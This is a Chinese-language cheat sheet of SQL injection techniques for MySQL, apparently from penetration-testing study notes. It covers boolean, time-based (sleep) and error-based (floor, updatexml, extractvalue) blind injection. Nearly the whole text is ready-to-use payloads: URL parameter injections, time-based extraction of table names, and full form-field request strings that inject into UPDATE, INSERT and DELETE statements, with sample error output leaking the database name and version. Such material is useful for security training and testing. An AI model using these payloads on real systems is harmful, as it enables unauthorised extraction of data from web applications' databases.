order by

select * from users order by $sth

盲注的三种类型

  1. 逻辑判断 regexp、like、ascii、left、ord、mid 
    like 'ro%'
regexp '^user[a-z]'

#截取字符串
mid(str,start_loc,length)
substr(str,start_loc,length)
left(str,length) #从左侧截取

#字符串长度
length()
  2. 延时判断 if、sleep 
    select * from users where id=1 and if(1>2,2,0);
select * from users where id=1 and sleep(5);
select * from users where id=1 and if(1>2,sleep(5),sleep(10));
  3. 报错回显 floor、updatexml、extractvalue

逻辑判断

例如:

?id=1' and length(database())=8--+
?id=1' and left(database(),1)>'a'--+

延时判断

and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+
and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0)--+

报错注入

12种报错注入+万能语句

更新注入
update user set username='$name' where id = 1
$name = "' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '"
// 结果
update user set username='' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '' where id = 1

出现结果ERROR 1062(23000): Duplicate entry '1~security~' for key 'group_key',则得到库名为security; 若将database()改为version(),则提示ERROR 1062(23000): Duplicate entry '1~5.5.53~' for key 'group_key'

  • 其他注入语句
sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or (select 1 from(select count(*),concat( floor(rand(0)*2),0x7e,(database()),0x7e)x from information_schema.character_sets group by x)a) or '&email=wuhan&submit=submit
sex=%E7%94%B7&phonenum=13878787788&add=hubeNicky' or  updatexml(1,concat(0x7e,(version())),0) or '&email=wuhan&submit=submit
sex=%E7%94%B7&phonenum=13878787788&add=Nicky' or extractvalue(1,concat(0x7e,database())) or '&email=wuhan&submit=submit
插入注入
username=x' or(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or '
&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit
username=x' or updatexml(1,concat(0x7e,(version())),0) or '&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit
username=x' or extractvalue(1,concat(0x7e,database())) or '&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit
删除注入
or+(select+1+from(select+count(*),concat(floor(rand(0)*2),0x7e,(database()),0x7e)x+from+information_schema.character_sets+group+by+x)a)
or+updatexml+(1,concat(0x7e,database()),0)
or+extractvalue(1,concat(0x7e,database()))